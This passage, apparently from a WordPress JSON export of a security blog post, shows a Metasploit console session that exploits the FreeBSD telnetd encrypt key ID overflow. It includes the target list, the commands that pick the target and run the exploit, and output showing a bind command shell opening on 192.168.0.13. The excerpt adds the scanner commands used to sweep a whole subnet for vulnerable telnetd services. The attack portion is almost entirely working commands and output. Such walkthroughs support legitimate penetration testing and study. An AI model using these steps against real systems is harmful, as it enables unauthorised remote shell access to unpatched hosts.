class=\"nu0\">8.0<\/span><br \/>\n&nbsp; <span class=\"nu0\">4<\/span> &nbsp; FreeBSD <span class=\"nu0\">7.3<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">7.4<\/span><br \/>\n&nbsp; <span class=\"nu0\">5<\/span> &nbsp; FreeBSD <span class=\"nu0\">7.0<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">7.1<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">7.2<\/span><br \/>\n&nbsp; <span class=\"nu0\">6<\/span> &nbsp; FreeBSD <span class=\"nu0\">6.3<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">6.4<\/span><br \/>\n&nbsp; <span class=\"nu0\">7<\/span> &nbsp; FreeBSD <span class=\"nu0\">6.0<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">6.1<\/span><span class=\"sy0\">\/<\/span><span class=\"nu0\">6.2<\/span><br \/>\n&nbsp; <span class=\"nu0\">8<\/span> &nbsp; FreeBSD <span class=\"nu0\">5.5<\/span><br \/>\n&nbsp; <span class=\"nu0\">9<\/span> &nbsp; FreeBSD <span class=\"nu0\">5.3<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<div class=\"codecolorer-container bash vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/>17<br \/>18<br \/><\/div><\/td><td><div class=\"bash codecolorer\">msf &nbsp;exploit<span class=\"br0\">&#40;<\/span>telnet_encrypt_keyid<span class=\"br0\">&#41;<\/span> <span class=\"sy0\">&gt;<\/span> <span class=\"kw1\">set<\/span> target <span class=\"nu0\">7<\/span><br \/>\ntarget =<span class=\"sy0\">&gt;<\/span> <span class=\"nu0\">7<\/span><br \/>\nmsf &nbsp;exploit<span class=\"br0\">&#40;<\/span>telnet_encrypt_keyid<span class=\"br0\">&#41;<\/span> <span class=\"sy0\">&gt;<\/span> exploit <span class=\"re5\">-j<\/span><br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Exploit running <span class=\"kw2\">as<\/span> background job.<br \/>\n<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Started <span class=\"kw3\">bind<\/span> handler<br \/>\nmsf &nbsp;exploit<span class=\"br0\">&#40;<\/span>telnet_encrypt_keyid<span class=\"br0\">&#41;<\/span> <span class=\"sy0\">&gt;<\/span> <span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Sending first payload<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Sending second payload...<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Sending stage <span class=\"br0\">&#40;<\/span><span class=\"nu0\">46<\/span> bytes<span class=\"br0\">&#41;<\/span> to 192.168.0.13<br \/>\n<span class=\"br0\">&#91;<\/span><span class=\"sy0\">*<\/span><span class=\"br0\">&#93;<\/span> Command shell session <span class=\"nu0\">2<\/span> opened <span class=\"br0\">&#40;<\/span>192.168.0.8:<span class=\"nu0\">48865<\/span> -<span class=\"sy0\">&gt;<\/span> 192.168.0.13:<span class=\"nu0\">4444<\/span><span class=\"br0\">&#41;<\/span> at <span class=\"nu0\">2012<\/span>-01-<span class=\"nu0\">18<\/span> <span class=\"nu0\">11<\/span>:03:<span class=\"nu0\">55<\/span> <span class=\"re5\">-0500<\/span><br \/>\nsessions <span class=\"re5\">-l<\/span><br \/>\n<br \/>\nActive sessions<br \/>\n===============<br \/>\n<br \/>\n&nbsp; Id &nbsp;Type &nbsp; &nbsp; &nbsp; Information &nbsp;Connection<br \/>\n&nbsp; <span class=\"re5\">--<\/span> &nbsp;<span class=\"re5\">----<\/span> &nbsp; &nbsp; &nbsp; <span class=\"re5\">-----------<\/span> &nbsp;<span class=\"re5\">----------<\/span><br \/>\n&nbsp; <span class=\"nu0\">2<\/span> &nbsp; shell bsd &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 192.168.0.8:<span class=\"nu0\">48865<\/span> -<span class=\"sy0\">&gt;<\/span> 192.168.0.13:<span class=\"nu0\">4444<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Mentioned by hdm here and here but I wanted to make a note of this myself. First thing to do is setup the scan to look for vulnerable telnetd services: 12345msf &gt; use auxiliary\/scanner\/telnet\/telnet_encrypt_overflow msf &nbsp;auxiliary&#40;telnet_encrypt_overflow&#41; &gt; set RHOSTS 192.168.0.0\/24 RHOSTS =&gt; 192.168.0.0\/24 msf &nbsp;auxiliary&#40;telnet_encrypt_overflow&#41; &gt; set THREADS 64 THREADS =&gt; 64 And now to [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[64,4],"tags":[137,136,456,138,135],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/335"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=335"}],"version-history":[{"count":5,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/335\/revisions"}],"predecessor-version":[{"id":350,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/335\/revisions\/350"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=335"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/categories?post=335"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=335"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}